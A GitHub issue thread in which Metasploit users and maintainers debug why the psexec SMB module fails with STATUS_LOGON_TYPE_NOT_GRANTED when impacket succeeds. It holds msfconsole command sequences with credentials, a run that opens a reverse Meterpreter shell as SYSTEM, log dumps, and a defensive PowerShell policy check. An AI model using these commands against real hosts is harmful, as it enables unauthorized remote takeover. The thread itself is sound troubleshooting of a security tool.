rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

exploit/windows/smb/psexec does not work while impacket-psexec does #15159

Open friedrico opened 3 years ago

friedrico commented 3 years ago

Why does exploit/windows/smb/psexec react differently from impacket-psexec? Shouldn't they do the same thing?

```
impacket-psexec "loca:Pass"@172....
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 172.....
[*] Found writable share ADMIN$
[*] Uploading file fPZKRTEM.exe
[*] Opening SVCManager on 172.....
[*] Creating service tQTR on 172.....
[*] Starting service tQTR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.16299.192]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>
```

```
use exploit/windows/smb/psexec
set rhosts  172...
set lhost tap0
set smbuser loca
set smbpass Pass
run
[*] Started reverse TCP handler on 17...:4444
[*] 172....:445 - Connecting to the server...
[*] 172....:445 - Authenticating to 172...:445 as user 'loca'...
[-] 172....:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.
```

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 3 years ago

It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.

This includes:

The easier it is for us to replicate and debug an issue, the higher the chance of it being resolved.

adfoster-r7 commented 3 years ago

cc @cdelafuente-r7 - I'm not sure if there's enough detail to replicate the original issue, but does anything pop out to you as being different maybe? 🤔

cdelafuente-r7 commented 3 years ago

I just tested against Windows 10 version 20H2 and could not reproduce the issue:

msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                <redacted_ip>    yes       The target host(s), range CIDR identifier, or hosts file with sy
                                                    ntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                                  no        The share to connect to, can be an admin share (ADMIN$,C$,...) o
                                                    r a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               <redacted>       no        The password for the specified username
   SMBUser               smbtest          no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <redacted_ip>    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(windows/smb/psexec) > set verbose true
verbose => true
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on <redacted_ip>:4444
[*] <redacted_ip>:445 - Connecting to the server...
[*] <redacted_ip>:445 - Authenticating to <redacted_ip>:445 as user 'smbtest'...
[!] <redacted_ip>:445 - No active DB -- Credential data will not be saved!
[*] <redacted_ip>:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] <redacted_ip>:445 - PowerShell found
[*] <redacted_ip>:445 - Selecting PowerShell target
[*] <redacted_ip>:445 - Powershell command length: 2463
[*] <redacted_ip>:445 - Executing the payload...
[*] <redacted_ip>:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Obtaining a service manager handle...
[*] <redacted_ip>:445 - Creating the service...
[+] <redacted_ip>:445 - Successfully created the service
[*] <redacted_ip>:445 - Starting the service...
[+] <redacted_ip>:445 - Service start timed out, OK if running a command or non-service executable...
[*] <redacted_ip>:445 - Removing the service...
[+] <redacted_ip>:445 - Successfully removed the service
[*] <redacted_ip>:445 - Closing service handle...
[*] Sending stage (175174 bytes) to <redacted_ip>
[*] Meterpreter session 1 opened (<redacted_ip>:4444 -> <redacted_ip>:50158) at 2021-06-08 18:36:12 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-UUQE0B4
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

@friedrico, it would be great if we could have more details to help us reproduce the issue. Also, a PCAP would be useful. Since SMBv3 with encryption is used by default, please disable encryption with this option to get a meaningful packet capture:

```
set SMB::AlwaysEncrypt false
```

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 3 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

friedrico commented 3 years ago

Sorry, haven't had time.

I just repeated the actions - still the same problem, even after using `set SMB::AlwaysEncrypt false`.

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

```
[framework/ui/console]
ActiveModule=exploit/windows/smb/psexec
[windows/smb/psexec]
WfsDelay=10
EXITFUNC=thread
WORKSPACE=
VERBOSE=true
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=172...
RPORT=445
SSL=false
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
DCERPC::max_frag_size=4096
DCERPC::fake_bind_multi=true
DCERPC::fake_bind_multi_prepend=0
DCERPC::fake_bind_multi_append=0
DCERPC::smb_pipeio=rw
DCERPC::ReadTimeout=10
NTLM::UseNTLMv2=true
NTLM::UseNTLM2_session=true
NTLM::SendLM=true
NTLM::UseLMKey=false
NTLM::SendNTLM=true
NTLM::SendSPN=true
SMB::pipe_evasion=false
SMB::pipe_write_min_size=1
SMB::pipe_write_max_size=1024
SMB::pipe_read_min_size=1
SMB::pipe_read_max_size=1024
SMB::pad_data_level=0
SMB::pad_file_level=0
SMB::obscure_trans_pipe_level=0
SMBDirect=true
SMBUser=loca
SMBPass=pass
SMBDomain=.
SMBName=*SMBSERVER
SMB::VerifySignature=false
SMB::ChunkSize=500
SMB::Native_OS=Windows 2000 2195
SMB::Native_LM=Windows 2000 5.0
SMB::ProtocolVersion=1,2,3
SMB::AlwaysEncrypt=false
SERVICE_NAME=
SERVICE_DISPLAY_NAME=
SERVICE_DESCRIPTION=
SERVICE_PERSIST=false
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=true
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
SMBSHARE=
ALLOW_GUEST=false
SERVICE_FILENAME=
PSH_PATH=Windows\System32\WindowsPowerShell\v1.0\powershell.exe
SERVICE_STUB_ENCODER=
CMD::DELAY=3
PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=tap0
```

History

The following commands were run during the session and before this issue occurred:

```
2000 use exploit/windows/smb/psexec
2001 set smbuser loca
2002 set smbpass pass
2003 set rhosts 172...
2004 set lhost tap0
2005 set verbose true
2006 set SMB::AlwaysEncrypt false
2007 run
2008 debug
```

Framework Errors

The following framework errors occurred before the issue occurred:

```
...
[09/28/2021 04:22:06] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
```

Web Service Errors

The following web service errors occurred before the issue occurred:

```
msf-ws.log does not exist.
```

Framework Logs

The following framework logs were recorded before the issue occurred:

```
...
[09/28/2021 04:19:30] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[09/28/2021 04:19:36] [d(0)] core: HistoryManager.push_context name: :msfconsole
[09/28/2021 04:20:05] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[09/28/2021 04:20:10] [d(0)] core: HistoryManager.push_context name: :msfconsole
[09/28/2021 04:20:53] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[09/28/2021 04:20:58] [d(0)] core: HistoryManager.push_context name: :msfconsole
[09/28/2021 04:22:05] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[09/28/2021 04:22:06] [d(0)] core: Negotiated SMB version: SMB3
[09/28/2021 04:22:06] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
```

Web Service Logs

The following web service logs were recorded before the issue occurred:

```
msf-ws.log does not exist.
```

Version/Install

The versions and install method of your Metasploit setup:

```
Framework: 6.1.7-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Other - Please specify
```

base64(pcap): sanitized

```
base64 -d <<< BASE64STR > my.pcap
```

Can I unclose the issue?

adfoster-r7 commented 3 years ago

@friedrico Thanks for the update :+1: Just as an additional datapoint - what was the target OS, i.e. output of systeminfo?

friedrico commented 3 years ago

> @friedrico Thanks for the update :+1: Just as an additional datapoint - what was the target OS, i.e. output of systeminfo?

```
meterpreter > sysinfo
Computer        : WIN7
OS              : Windows 10 (10.0 Build 16299).
Architecture    : x64
System Language : en_US
Domain          : ...
Logged On Users : 6
Meterpreter     : x86/windows
```

github-actions[bot] commented 2 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 2 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 2 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 2 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

jeffmcjunkin commented 1 year ago

Beep boop, I think the inactivity bot closed this one erroneously. Can we re-open?

This is still affecting recent systems -- here's a Windows 10 target example with the output of systeminfo:

```
meterpreter > execute -if "systeminfo"
Process 6836 created.
Channel 4 created.
Host Name:                 irrelevant
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.19044 N/A Build 19044
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00329-10181-97955-AA169
Original Install Date:     5/3/2022, 11:35:25 PM
System Boot Time:          11/11/2022, 6:44:39 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
                           [02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC) Coordinated Universal Time
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,468 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,350 MB
Virtual Memory: In Use:    1,449 MB
```

Metasploit version:

```
msfconsole -qx 'version'
Framework: 6.0.27-dev-
Console  : 6.0.27-dev-
```

jeffmcjunkin commented 1 year ago

Tagging @adfoster-r7 (like a jerk) since I'm not sure how notifications work on closed issues.

adfoster-r7 commented 1 year ago

@jeffmcjunkin Thanks for the ping; I grabbed friedrico's pcap and it seems like it might be an issue when using psexec with a local admin. Google's hinting that it might be a difference between using psexec and psexec -i for interactive logons versus network logon - but I haven't found the right gpo/priv incantations to replicate the error.

If there's more details for how to create an env to reproduce this error that would be appreciated 💯

Edit: I added a user to the "Deny access to this computer from the network" GPO and got the STATUS_LOGON_TYPE_NOT_GRANTED error:

```
msf6 exploit(windows/smb/psexec) > run smb://admin_without_remote:p4$$w0rd@192.168.123.13

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|testing as user 'admin_without_remote'...
[-] 192.168.123.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.
```

but impacket didn't work either, so I'm probably close to the right area - but still haven't fully replicated yet 🤔

```
python3 ~/Documents/code/impacket/examples/psexec.py 'admin_without_remote:p4$$w0rd@192.168.123.13'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_TYPE_NOT_GRANTED(A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.)
```

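A host-side check for the condition reproduced in the comment above. This is an added example, not code from the Metasploit project or from anyone in this thread: it exports the local user-rights assignments with `secedit` and reports whether a given account is covered, directly or through a local group, by `SeDenyNetworkLogonRight`, the policy shown in the Group Policy editor as "Deny access to this computer from the network". That assignment is what makes an SMB (network) logon with a correct password fail with STATUS_LOGON_TYPE_NOT_GRANTED (0xc000015b). It assumes an elevated PowerShell 5.1 or later session on the host being checked; the account name is a placeholder.

```powershell
# Added example (not Metasploit project code). Reports whether $UserName falls under
# the "Deny access to this computer from the network" user right, which causes
# STATUS_LOGON_TYPE_NOT_GRANTED (0xc000015b) on SMB/network logons.
# Assumes an elevated PowerShell 5.1+ session on the host under inspection.
param(
    [Parameter(Mandatory = $true)]
    [string]$UserName   # placeholder, e.g. 'admin_without_remote'
)

function Resolve-Sid {
    param([string]$Account)
    # Translate 'DOMAIN\user' or 'user' to its SID string; $null if it cannot be resolved.
    try {
        (New-Object System.Security.Principal.NTAccount($Account)).Translate(
            [System.Security.Principal.SecurityIdentifier]).Value
    } catch { $null }
}

function Resolve-Name {
    param([string]$SidString)
    # Translate a SID string back to an account name; fall back to the SID itself.
    try {
        (New-Object System.Security.Principal.SecurityIdentifier($SidString)).Translate(
            [System.Security.Principal.NTAccount]).Value
    } catch { $SidString }
}

$userSid = Resolve-Sid $UserName
if (-not $userSid) { throw "Cannot resolve account '$UserName'" }

# secedit writes the effective local security policy as an INI file; the USER_RIGHTS
# area holds the user-rights assignments, one right per line, values comma separated.
$cfg = Join-Path $env:TEMP 'secpol-user-rights.inf'
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
try {
    $line = Get-Content -Path $cfg | Where-Object { $_ -match '^\s*SeDenyNetworkLogonRight\s*=' }
} finally {
    Remove-Item -Path $cfg -ErrorAction SilentlyContinue
}

if (-not $line) {
    Write-Output "SeDenyNetworkLogonRight is not assigned on this host; look for another cause."
    return
}

# Entries are SIDs prefixed with '*' (e.g. *S-1-5-32-546 for Guests) or plain account names.
$entries = (($line -split '=', 2)[1]).Trim() -split ',' |
    ForEach-Object { $_.Trim() } | Where-Object { $_ }

foreach ($entry in $entries) {
    $entrySid = if ($entry.StartsWith('*')) { $entry.Substring(1) } else { Resolve-Sid $entry }
    if (-not $entrySid) { continue }
    $entryName = Resolve-Name $entrySid

    if ($entrySid -eq $userSid) {
        Write-Output "DENIED: '$UserName' is listed directly in SeDenyNetworkLogonRight."
        return
    }

    # The deny right may be assigned to a local group the account belongs to.
    $members = Get-LocalGroupMember -SID $entrySid -ErrorAction SilentlyContinue
    if ($members | Where-Object { $_.SID.Value -eq $userSid }) {
        Write-Output "DENIED: '$UserName' inherits the deny right through group '$entryName'."
        return
    }
}

Write-Output "'$UserName' is not covered by SeDenyNetworkLogonRight; check other logon-type restrictions."
```

The check only resolves local group membership, so a domain group listed in the policy is reported by name but not expanded. As the comment above notes, impacket also fails when the account is in this policy, so a positive result here explains the error but does not by itself reproduce the original report, where impacket succeeded.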
jeffmcjunkin commented 1 year ago

Tagging @joswr1ght who has encountered this issue as well, and I think can replicate it at will.

github-actions[bot] commented 1 year ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

jeffmcjunkin commented 1 year ago

Beep boop, this issue isn't Stale. @joswr1ght, can you still replicate this?

adfoster-r7 commented 1 year ago

The steps for enabling the flags/policies to get an account to trigger this error locally where Metasploit fails and other tools succeed would definitely be appreciated 💯

I'm still thinking it's something to do with network logins versus interactive logins, but I haven't looked at this since poking at it last.